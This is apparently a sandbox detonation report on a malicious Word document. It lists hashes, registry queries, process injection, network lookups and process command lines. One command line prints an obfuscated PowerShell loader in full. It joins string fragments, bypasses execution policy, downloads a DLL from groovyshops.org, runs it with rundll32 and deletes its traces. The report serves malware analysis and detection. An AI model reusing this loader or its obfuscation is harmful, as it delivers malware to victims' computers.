| SHA256 | 772bf94806392d132b6aef7b2ea62649a77f3ac165158d8dd22dd9e8620d9dbd |
| SHA512 | 2888067d9ff8196d4c2525756c58899290a4da832776c1b0b75b898e6f5a3c43b2d038d981cec1856de8842b2a4b90b5c419bbfd35f6e0011132a57b19a55104 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Core_Commands.help.txt
| MD5 | ba47e8024553dcf2e0accdf9cdcaf8a9 |
| SHA1 | aecc05a68c01533a19e667ba35c410010592e5b3 |
| SHA256 | de62ff1271b7de9799ca6cc135609e9af95538ee370badc1d607698cfcfbcdda |
| SHA512 | 1fa4ada7e88fe9a9c61a38f5f1ceeef44e41a59ea5dfaca3858fbfbcd506c8c33d3db188f5987edf5bdeda4a9a8909061556a91a9f0ca862820ad63d17b3f53d |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Continue.help.txt
| MD5 | 82efcd37b0c24c85afc05b07357d7ad7 |
| SHA1 | 8656541326be6a21e47c83c318b222b00f7dc582 |
| SHA256 | fc6338cf21ba159b85abd24f3243cb28833370719d44edfd28aceba40a3e7aee |
| SHA512 | 60778c599c141a11d429acf540cd7aee2c745a189c1a596403aca9e3851e5b71be1573c22f947364e1c0564da976878de0f8b5ce8256795f47cdec3ef1e8f93c |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Comparison_Operators.help.txt
| MD5 | 02cb964baa087eef002abee9fe44b737 |
| SHA1 | f0984de65b88a05a587f73a65390bec75f525893 |
| SHA256 | c9ed776cb3db4aee63bad4241b924331535734383819864d5e3dacd3f13ce966 |
| SHA512 | b8b1aac40532ba210b1a3063a4157a31f633606415beccdafcadb440924a45678d20c91308aab65e99e73a1e265548dcc682e87b0cd9481aee5e40a386a9d3ce |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_CommonParameters.help.txt
| MD5 | fbe14cf1b768d59274268a2f2be325d6 |
| SHA1 | 927a2c41c33fe6e2a11123572f7006513f61d238 |
| SHA256 | 73e4622de52a79256a31a9106c6bde06f504d947bba4c9447659d0c5bae29bc0 |
| SHA512 | 994dd644b4de9ba096c25869d0ec7b2515e619312f8c12d433fa4dee2ed5d80ab29c5483b73fb5353f4e6a00104805c1d29d026e4f6ca3c52a71b0d8b66f1db4 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Comment_Based_Help.help.txt
| MD5 | 009b7ec3fd8f6c5daad1ab8f873915b6 |
| SHA1 | bca72d30c853f8ac9786fee63dbfc920c2a137e4 |
| SHA256 | 430f02362331f401c42b01e1e5db75aace1dd21cf284eca9c75d7f3ce5887317 |
| SHA512 | f20f440fa5318c1d003e1412475a941a34c38e4c35ff2cf2f5e307d0aaedc558afed0dfda3da73c50d59533b295eb07d9e18b950cfe8df346c40613d750bcf5e |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Command_Syntax.help.txt
| MD5 | ffd244fc1f06b51c996b5a6872320423 |
| SHA1 | 740900b06bc02dfc5c6021e73ea77efd4b96f30f |
| SHA256 | 91eeabb4ed7c2ec5871c9687ca9d2e9c95d0fdf1235dd2458da2503223d5b0f2 |
| SHA512 | 34c8b5acc1fa2dcf7708238c5778591c421e8eac724c9d63dbe2b83d4184812a64d97a0bcf0aebf4128d88da6c11aad7cd383c7a4f96fcf4b3d2b6b52de853b1 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_command_precedence.help.txt
| MD5 | 506751f802c30165339fbe9f6ded6bdb |
| SHA1 | 128f8f92eac5ccbb746122ee084c3f94a134cee1 |
| SHA256 | a9a9eeb12ac7959dbe46322ab40fe4794be936d4a4b9ecfc1a9e7e6c93feaf9f |
| SHA512 | a14fccddb1682af9a2a6c8d1e739d4416ee4f5c2ed816b0e480946e6b8ddbc69b7c408fb3309e06c5c8f049142558ef4402d98eafbb3b35d3a0ba9075f3ae445 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Break.help.txt
| MD5 | 710ff8a9e47e741f5d09c82ffcae3057 |
| SHA1 | 2308e17617a45716e1664b591fab17227630f6b2 |
| SHA256 | 3c4bd767e1e9027c5f8fa7f2717bc3a32fe71cc808c3b53fcf0eff3fa62fdcc3 |
| SHA512 | 2624b4b7b784043e4cbfe5bb51292998d276aaa75366906b571f8d66c9408352726d65ee2e78e92d58db247037a0d4d48199c3a442977404568aaa43874a1aca |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Automatic_Variables.help.txt
| MD5 | 2060451a52f4a9083f0f554492d7b261 |
| SHA1 | 346ba51823c9b0a67cbc0509adfe789b7b681a0d |
| SHA256 | 5a16ce4adf1b862edf7bd253e66bfc125cd79b227729f5a0522a84d37f004858 |
| SHA512 | 3ac42e061aa4c104a05e24d54d256fbfb702f43d4f4bcb8b84db13f626320779f5ecb865b515a8af00b0220b5cab1c4db7ddd97c8265c4bec68655f4426138c7 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Assignment_Operators.help.txt
| MD5 | b335d7490dd7429bd096fee82a807008 |
| SHA1 | 167d0d8543f818425cefc25865b978de906aa301 |
| SHA256 | 1b669af68a8743144b0a2812471afd504cef88b449d91e2c2d5c58cce98328f6 |
| SHA512 | c1eaa81c5ef42a6de736bcc2195fb82f0b37638ec84d1f6a421417fa87eebd0418fc642446f3cf3c831b36fbaac97d530d7e36de8ee5b47a8bd1397e0b7b022a |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_arrays.help.txt
| MD5 | 253b0f328ce98fb2d89f4de1a093df1a |
| SHA1 | 1f0a9729416fce3a216ad2e74d695fcc175ea707 |
| SHA256 | 907593a534706387725101cc8eeeef44d0df4de22a90f17789055769e103004f |
| SHA512 | 838dfa89927ce6112aba361fd3b13f5b283f07038f17b3a7355fd8ba87fc8c2c03fe3c8ab2a239dd78231b18ae197e3ea4c7ef9d26ddea17dfef0533967638de |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Arithmetic_Operators.help.txt
| MD5 | d29f635492b5b2f98d7623284899b1aa |
| SHA1 | 5db4c47cc44f17848b80029d8a8348cef7a5dc56 |
| SHA256 | 8d5de2726faeb445042196cfd80b132bf5adb2c87241f42a29c88e9d75fcb759 |
| SHA512 | 923d2fd2f82dda05f63d3a8ab7b091dd4a8ff5b5404171bdebc96f0401bf3d84334f0d9b6f43495656f6a7997c194ce58046d20ef31d8e24e7bb056f961a2f11 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_aliases.help.txt
| MD5 | 8f461cb12c72a2704845e509ed06c858 |
| SHA1 | 554b6c81fb67569f1dbb5a0423d113a7d0f9a57c |
| SHA256 | 12898e59ef4f1e6729d79ba022883a7e6f088447767a02e8534e11f04424d644 |
| SHA512 | b5d065f46540f7c3087dc613cfa1026da249a19f669b354bf3caa035c58e44f6ba335ee7075877d404f9d539584c8c3a63c6cceafce2d80df986fea7399bdbba |
memory/2284-745-0x0000000070B8D000-0x0000000070B98000-memory.dmp
memory/2284-746-0x0000000000450000-0x0000000000550000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 971725ce794c620315c14c3f81237595 |
| SHA1 | 65db3fbac64d4dd5689f130de853ff3c5059c280 |
| SHA256 | 3a556c634df4b0aa3ad41133d0afa3fc488b88a7f9cb50a1cb329dfd96f5cb4e |
| SHA512 | d0dbcb64f331a215d993ca32841888d5cf50414540d18d0630c6d1e9498c36c1d4c9ef253b4e6d9760cfbb2cf7a9a579c85fed9b48c644f49550e18ab44266a6 |
memory/2284-761-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2284-762-0x0000000070B8D000-0x0000000070B98000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-20 04:19
Reported
2024-05-20 04:22
Platform
win10v2004-20240508-en
Max time kernel
145s
Max time network
127s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4984 wrote to memory of 4944 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe |
| PID 4984 wrote to memory of 4944 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe |
| PID 4944 wrote to memory of 948 | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | C:\Windows\system32\rundll32.exe |
| PID 4944 wrote to memory of 948 | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | C:\Windows\system32\rundll32.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc" /o ""
C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe $oaibfxvjiowlxxw_iekfpfyiuuoycid='org/CJ';$natpxmhofkbbeb_huseueei='ojqa';$owaizbpyuaoyyawtzcwqygabpqsrqeeidno4=' =';$eikoia_yblegbmybniemxea_ogwepz='e]$ojqa0';$mdroaenb_esuwo='ient).';$wvmbvwoxkjuhjt='($env:a';$mzoiuddeyajlqncmnrvpotqghzbopauau='($';$tcozygiwfcyinfvnu_euqaocnlecylzi='br';$qcyeatbinwxsmezc_hmhviayrcnolalvknuiefhjf='+ ''';$aoauapzujgioje_xidu_aaibeabsc87='.php';$okeygvmueodiuuyuz='Net';$yitmzuozoufzu_lficf_gdhpoeuqao2='$env:t';$sgagyyoabqaaaioi='k;}}Se';$cfruonrvvuhve_ixrbnpdclveyouklainlriu=' $path=';$aooajmeeiyupyyusaqxznw='Downl';$yamzywruogbpvbyuunmq97=' -Sc';$mwyzyn_vhaa_gzewtucmxgu='a+''\';$udm_ug_rphwvtreioe_jtneafrollnf_xjuwpzz='ea';$gvsudskwuyopb_kekkatmqpdqasgaegjhsvki=''',$pat';$vbsif_aeknkgtcrajatpyktombewksswo='t-';$mmwsme_kyvxu_edvejwrrwdtvuseduio_lnwi_es='%s';$ua_wybbegalseqrkkigmuueik='rmat ';$bxauxi_gdiqlvelokehc=');(Ne';$iu_ebbubieeuynqayu_rcpfykziuepqojd02='.Webcl';$ubgieohxfasnveuauyunvnyyafalf_tuf='ct S';$rlhio_vzhdxeytzwdajcaio='lcn';$c_qwtnvmm_mwitcyidseg=') -';$uymddyuwrfj_truyyqv=' = $';$ieaetbrqnosgobb='xeofiu''';$ulhqbioxuairmxscoeywdo='\g';$iiqjwpysluziyi='h); rund';$fm_lzloaflyqunl_rrvjpmd=' Ge';$kayrdaavkijoqmiiieadeowqbw='oad';$s_bvcqmepdogzwmoqwr_uscmigyassarl='; $qgyx';$uso_dl_vwzkeeskgpp_ibvewjmr='uCokZbLZ';$atke_aahgy_awuhinj_yarqjoiagbdomxcm='Ex';$ytr_ulakmoxieyuuqsa='ope P';$wmqaligua_xjensemze='le(';$uziux_cxljaau='olic';$qdkp_tslelwso_iuwnaby_np='11;whi';$upfihhmu_bruiaypxwc_nzfkbtrgtx_yujyep_jxyuu5='ate -UFo';$oauwfabx_dhpjo_iodh_ulpunmfktuavteai=' ''f1'';Re';$wtoxtvoiougt_y='re';$byadiryyayieeidgqqmjrgeactagkrpexhu='emp ';$bqgddecgsiiajzoourpmbdeayguxj='cur';$sq_aqnpeltdkhy_idwjrpgmqq_ufzty='et-Da';$ijfkefmziiwkqqxy='shops.';$ydndgjo_eeopr_fdjdezhomjqqeyeeyeyu_qb='File(''';$idrypqufftaiazps='yste';$egxtowvvxgkzyeykhonizpgwa_rjoeuanpo=' $path ,';$fsyy_cy_ydewla_a_yeifzavusld_e='ll32';$txjyexcuyf_moyzdaaylgqru='ecutionP';$aef_noyxiax_puskee='ad = G';$brraekqxipsc_u='m 4';$acgyap_iqwholxtyekmd_xoayczaumoao='0 + 11.';$tmi_hibeeyaxhueiswapcwr='y Bypass';$e_utyoesneikpukijvwxeamahf_ii='t-D';$gdzgogct_uzouwzezekvialzuqoi='ase.dll''';$uy_aywtlioixpgipyixqufajvjnfk_a='et';$kzfwuwzbhtztiihor_rhaiscfboclhe='77;if';$qpb_elgvzsl_iqmfch='lcnad -g';$kgeyoiapuoiutzvlkft_f_bnbmioasyv='eep -';$uiieeutyymuyscizu62='){';$cnyjzkyeff_uobpdkcas='t-Sl';$ei_oefjuuyalgvsyjxnewacxtxr='tem (';$iivobpybzsthaoopoisugotiiiieduhhr08='rmat';$jptjeey_kzmhoaosrugpervewfwzsvvs='[doubl';$xknnmepjaanpebhypu='ppdat';$igeoekzbisdoztezqosdyeuokg='1){ $';$vxzopznvaorxujcbx='te -UFo';$p_lmbqvpyzegfzwimu='w-Obje';$pstxzidydhkykpkknua='m.';$ieenx_au_yycve_svmhohfeaxessifksygx='se -forc';$alfwlkamnera=' %s;Star';$ao_mbuayqujiyyapwsniiue='move-I';$wcfdjjedlijj0='//groovy';$somgplgrotbymcrajk_y='e;';$yagwueilv_uavozttcstoizd_vlvgm_ia_uvjhahrp='rocess;';$lzbwawc_sfiygjoyuucrzy_aii='http:';$auijlrquyuonww_xotmtfapkxbzyaoeea64='e $qgyx'; Invoke-Expression ($jptjeey_kzmhoaosrugpervewfwzsvvs+$eikoia_yblegbmybniemxea_ogwepz+$owaizbpyuaoyyawtzcwqygabpqsrqeeidno4+$fm_lzloaflyqunl_rrvjpmd+$e_utyoesneikpukijvwxeamahf_ii+$upfihhmu_bruiaypxwc_nzfkbtrgtx_yujyep_jxyuu5+$ua_wybbegalseqrkkigmuueik+$mmwsme_kyvxu_edvejwrrwdtvuseduio_lnwi_es+$s_bvcqmepdogzwmoqwr_uscmigyassarl+$uymddyuwrfj_truyyqv+$natpxmhofkbbeb_huseueei+$acgyap_iqwholxtyekmd_xoayczaumoao+$qdkp_tslelwso_iuwnaby_np+$wmqaligua_xjensemze+$igeoekzbisdoztezqosdyeuokg+$rlhio_vzhdxeytzwdajcaio+$aef_noyxiax_puskee+$sq_aqnpeltdkhy_idwjrpgmqq_ufzty+$vxzopznvaorxujcbx+$iivobpybzsthaoopoisugotiiiieduhhr08+$alfwlkamnera+$cnyjzkyeff_uobpdkcas+$kgeyoiapuoiutzvlkft_f_bnbmioasyv+$brraekqxipsc_u+$kzfwuwzbhtztiihor_rhaiscfboclhe+$mzoiuddeyajlqncmnrvpotqghzbopauau+$qpb_elgvzsl_iqmfch+$auijlrquyuonww_xotmtfapkxbzyaoeea64+$uiieeutyymuyscizu62+$tcozygiwfcyinfvnu_euqaocnlecylzi+$udm_ug_rphwvtreioe_jtneafrollnf_xjuwpzz+$sgagyyoabqaaaioi+$vbsif_aeknkgtcrajatpyktombewksswo+$atke_aahgy_awuhinj_yarqjoiagbdomxcm+$txjyexcuyf_moyzdaaylgqru+$uziux_cxljaau+$tmi_hibeeyaxhueiswapcwr+$yamzywruogbpvbyuunmq97+$ytr_ulakmoxieyuuqsa+$yagwueilv_uavozttcstoizd_vlvgm_ia_uvjhahrp+$cfruonrvvuhve_ixrbnpdclveyouklainlriu+$wvmbvwoxkjuhjt+$xknnmepjaanpebhypu+$mwyzyn_vhaa_gzewtucmxgu+$uy_aywtlioixpgipyixqufajvjnfk_a+$gdzgogct_uzouwzezekvialzuqoi+$bxauxi_gdiqlvelokehc+$p_lmbqvpyzegfzwimu+$ubgieohxfasnveuauyunvnyyafalf_tuf+$idrypqufftaiazps+$pstxzidydhkykpkknua+$okeygvmueodiuuyuz+$iu_ebbubieeuynqayu_rcpfykziuepqojd02+$mdroaenb_esuwo+$aooajmeeiyupyyusaqxznw+$kayrdaavkijoqmiiieadeowqbw+$ydndgjo_eeopr_fdjdezhomjqqeyeeyeyu_qb+$lzbwawc_sfiygjoyuucrzy_aii+$wcfdjjedlijj0+$ijfkefmziiwkqqxy+$oaibfxvjiowlxxw_iekfpfyiuuoycid+$uso_dl_vwzkeeskgpp_ibvewjmr+$aoauapzujgioje_xidu_aaibeabsc87+$gvsudskwuyopb_kekkatmqpdqasgaegjhsvki+$iiqjwpysluziyi+$fsyy_cy_ydewla_a_yeifzavusld_e+$egxtowvvxgkzyeykhonizpgwa_rjoeuanpo+$oauwfabx_dhpjo_iodh_ulpunmfktuavteai+$ao_mbuayqujiyyapwsniiue+$ei_oefjuuyalgvsyjxnewacxtxr+$yitmzuozoufzu_lficf_gdhpoeuqao2+$byadiryyayieeidgqqmjrgeactagkrpexhu+$qcyeatbinwxsmezc_hmhviayrcnolalvknuiefhjf+$ulhqbioxuairmxscoeywdo+$ieaetbrqnosgobb+$c_qwtnvmm_mwitcyidseg+$wtoxtvoiougt_y+$bqgddecgsiiajzoourpmbdeayguxj+$ieenx_au_yycve_svmhohfeaxessifksygx+$somgplgrotbymcrajk_y);
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\etase.dll f1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 19.89.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | groovyshops.org | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| NL | 23.62.61.184:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 184.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.200:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 200.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/4984-0-0x00007FFC86CD0000-0x00007FFC86CE0000-memory.dmp
memory/4984-2-0x00007FFC86CD0000-0x00007FFC86CE0000-memory.dmp
memory/4984-3-0x00007FFC86CD0000-0x00007FFC86CE0000-memory.dmp
memory/4984-4-0x00007FFC86CD0000-0x00007FFC86CE0000-memory.dmp
memory/4984-1-0x00007FFC86CD0000-0x00007FFC86CE0000-memory.dmp
memory/4984-5-0x00007FFCC6CED000-0x00007FFCC6CEE000-memory.dmp
memory/4984-6-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-7-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-10-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-12-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-11-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-13-0x00007FFC848A0000-0x00007FFC848B0000-memory.dmp
memory/4984-9-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-8-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-14-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-15-0x00007FFC848A0000-0x00007FFC848B0000-memory.dmp
memory/4984-16-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-18-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-17-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-20-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-19-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-35-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-44-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-62-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\gxeofiu\Modules\NetSecurity\it\Microsoft.Windows.Firewall.Commands.Resources.dll
| MD5 | d8fbcf4494a827061d390a8b26f30946 |
| SHA1 | c707a5f072498a3d2c09ba026cf46bcc48245f64 |
| SHA256 | d763a02a6b08ad1a4c0b5d4cebe6840e425bb69cffe084c27874386be5366572 |
| SHA512 | 0280e212b957d42b507e0f71651c7c061b44cca977af4f0f135fe6fe4129ee4e0caf9323539b7c459875cd00ccd7f214dad99bbbff99bfc10dc4365f6aad885e |
memory/4984-1005-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4984-1007-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/4944-1008-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp
memory/4944-1009-0x0000022121080000-0x00000221210A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zcwpxkz3.btp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\default.help.txt
| MD5 | 56b0b822141c6493d168c2f4a6c00ea2 |
| SHA1 | 37211f21dcf7a8fe4d4e5fdf0004a01436b9a84d |
| SHA256 | 80ba892518ce815e29b8700f0c0a0115bccd469a5f9a1fee844d667c2d638018 |
